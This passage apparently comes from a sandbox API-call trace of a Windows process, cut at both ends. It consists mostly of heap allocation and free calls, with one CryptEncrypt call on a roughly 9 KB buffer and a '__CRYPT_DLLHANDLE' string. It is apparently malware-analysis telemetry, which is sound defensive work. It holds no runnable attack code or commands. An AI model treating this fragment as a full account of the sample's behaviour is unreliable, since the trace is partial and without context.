0x2e55248 [0229.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0229.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0229.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0229.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0229.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0229.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0229.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0229.829] CryptEncrypt (in: hKey=0xa86f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x2479, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x2480) returned 1 [0229.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0229.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0229.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0229.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0229.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0229.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0229.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0229.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0229.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0229.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0229.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0229.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0229.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0229.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0229.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0229.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0229.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0229.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0229.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0229.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0229.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0229.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0229.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0229.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0229.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0229.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0229.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0229.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0229.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0229.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0229.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0229.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0229.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0229.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0229.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0229.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0229.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0229.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0229.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0229.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0229.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0229.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0229.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0229.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0229.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0229.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0229.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0229.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0229.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0229.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0229.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0229.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0229.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0229.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0229.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0229.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0229.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0229.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0229.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0229.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0229.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0229.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0229.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0229.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0229.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0229.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0229.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0229.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0229.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0229.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0229.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0229.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0229.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0229.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0229.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0229.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0229.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0229.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0229.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0229.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0229.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0229.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0229.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0229.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0229.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0229.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0229.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0229.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0229.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0229.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0229.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0229.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0229.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0229.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0229.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0229.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0229.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0229.834] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0229.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0229.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0229.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0229.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0229.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0229.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0229.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0229.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0229.835] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0229.835] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0229.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0229.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0229.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0229.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0229.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0229.836] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0229.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0229.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0229.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0229.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0229.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0229.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0229.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0229.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0229.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0229.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0229.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0229.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0229.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0229.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0229.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0229.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0229.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0229.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0229.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0229.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0229.837] CharLowerBuffW (in: lpsz="byte[9344]", cchLength=0xa | out: lpsz="byte[9344]") returned 0xa [0229.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0229.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0229.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0229.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0229.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0229.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0229.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0229.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0229.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0229.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0229.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0229.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0229.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0229.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0229.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0229.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0229.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2480) returned 0x2f14818 [0229.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0229.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0229.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0229.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0229.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0229.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0229.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0229.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0229.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0229.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0229.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0229.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0229.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0229.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0229.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0229.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0229.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0229.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0229.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0229.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0229.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0229.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0229.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0229.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0229.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0229.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0229.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0229.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0229.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0229.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2479) returned 0x2f16ca0 [0229.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0229.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2479) returned 0x2f19128 [0229.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0229.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0229.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0229.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0229.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0229.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16ca0 | out: hHeap=0x970000) returned 1 [0229.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0229.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0229.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f19128 | out: hHeap=0x970000) returned 1 [0229.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.841] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0229.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0229.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0229.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0229.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04700 [0229.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0229.841] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0229.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04700 | out: hHeap=0x970000) returned 1 [0229.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0229.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0229.841] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0229.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0229.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0229.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0229.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0229.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | 